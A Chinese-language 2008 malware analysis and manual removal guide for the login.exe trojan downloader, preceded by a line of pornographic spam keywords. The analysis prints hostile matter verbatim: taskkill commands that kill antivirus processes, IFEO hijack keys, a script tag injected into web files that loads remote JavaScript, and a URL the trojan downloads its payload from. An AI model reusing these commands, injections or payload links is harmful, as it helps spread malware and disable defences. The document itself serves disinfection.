欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

login.exe HGFS木馬下載器的手動查殺方法

 更新時間:2008年05月09日 13:42:39   作者:  
這是一個具有感染腳本功能和局域網傳播功能的木馬下載器
樣本信息:File: login.exe
Size: 25428 bytes
Modified: 2008年4月25日, 16:30:08
MD5: 9777E8C79312F2E3D175AA1F64B07C11
SHA1: 4236D76C4FAEFE1CDF22414A25E946E493E0D52E
CRC32: 5A562203

1.病毒初始化:創(chuàng)建互斥量HGFSMUTEX,保證系統內只有一個實例在運行

2.釋放如下文件或者副本
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復制到如下啟動文件夾中達到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe

3.執(zhí)行connnet.bat批處理內的內容

a.遍歷d~z盤 復制%systemroot%\system32\Autorun.inf和%systemroot%\system32\Autorun.exe到其根目錄下

b.判斷中毒機器是否處于局域網,如果是則利用ipc漏洞建立一個空連接,并把autorun.exe和%autorun.inf復制到機器的C$下面。

4.IFEO劫持某些殺毒軟件
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmon.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravmond.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravstub.exe
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ravtask.exe
指向c:\\我就不給你啟動.exe

5.試圖結束360軟件
cmd /c taskkill /im 360safe.exe /f
cmd /c taskkill /im 360tray.exe /f

6.遍歷所有磁盤刪除.gho文件

7.遍歷所有磁盤感染asp,htm,html,aspx,php等文件
在其尾部加入<script language=javascript src=http://down.******.cn/1.js></script>的代碼

8.鏈接網絡下載木馬
http://17vp.cn/down/gr.exe到
C:\Program Files\Internet Explorer\1.exe
但鏈接已經失效

解決方法:

1.復制如下文字 到剪貼板(假設系統在C盤)
%systemroot%\system32\Autorun.exe
%systemroot%\system32\Autorun.inf
%systemroot%\system32\connnet.bat
%systemroot%\system32\int.exe
并復制到如下啟動文件夾中達到開機啟動自身的目的
C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\All Users\「開始」菜單\程序\啟動\login.exe
C:\Documents and Settings\Default User\「開始」菜單\程序\啟動\login.exe


打開Xdelbox.exe
在下面的大框中 單擊右鍵 點擊 “剪貼板導入不檢查路徑”
之后剛才復制的那個文件列表將出現在下面的大框中
然后再在下面的大框中單擊右鍵 點擊 “立即重啟執(zhí)行刪除” 
軟件會自動重啟計算機

重啟計算機以后 會有兩個系統進入的選擇的倒計時界面
第一個是你原來的windows系統
第二個是這個軟件給你設定的dos系統
不用你管,它會自動選擇進入第二個系統
類似dos的界面滾動完畢以后 病毒就被刪除了
之后他會自動重啟進入正常模式

2.打開sreng 啟動項目 注冊表
刪除所有紅色的IFEO項目

3.建議屏蔽http://17vp.cn網站

相關文章

最新評論